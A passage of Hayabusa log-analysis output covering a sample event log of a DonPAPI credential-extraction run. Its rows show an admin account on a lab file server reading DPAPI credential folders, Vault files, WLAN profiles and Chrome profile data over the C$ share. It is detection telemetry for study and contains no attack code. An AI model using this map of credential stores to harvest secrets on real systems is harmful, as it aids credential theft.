+00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ServiceProfiles\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\ADSync\AppData\Local\Microsoft\Credentials | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Wlansvc\Profiles\Interfaces | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.765 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.780 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.780 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.796 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.813 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:02.815 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.702 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.702 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204 | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.717 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.717 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.735 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.735 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.735 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.750 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.766 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.781 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.797 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.813 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.830 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.832 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default User\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 07:16:03.835 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\hack1\AppData\Local\Google\Chrome\User Data\Default | IP Addr: 10.23.123.11 | LID: 